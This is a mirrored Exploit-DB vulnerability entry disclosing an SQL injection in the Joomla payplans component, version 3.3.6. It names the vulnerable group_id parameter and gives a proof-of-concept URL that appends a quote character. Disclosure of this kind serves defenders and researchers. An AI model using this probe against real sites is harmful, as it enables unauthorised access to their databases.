Joomla! Component com_payplans 3.3.6 – SQL Injection

  • 作者: Persian Hack Team
    日期: 2016-06-13
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/39936/
  • ######################
    # Exploit Title : Joomla com_payplans - SQL Injection
    # Exploit Author : Persian Hack Team
    # Vendor Homepage : http://extensions.joomla.org/extension/payplans
    # Category: [ Webapps ]
    # Tested on: [ Win ]
    # Version: 3.3.6
    # Date: 2016/06/08
    ######################
    #
    # PoC:
    
    # group_id Parameter Vulnerable To SQL
    
    # Demo :
    
    # http://server/index.php?option=com_payplans&group_id=4%27
    
    # Youtube : https://www.youtube.com/watch?v=Y5mpM0IBlUk
    
    ######################
    # Discovered by : Mojtaba MobhaM 
    # Greetz : Muhmmad Emad & T3NZOG4N & FireKernel & Milad Hacking & JOK3R And All Persian Hack Team Members
    # Homepage : persian-team.ir
    ######################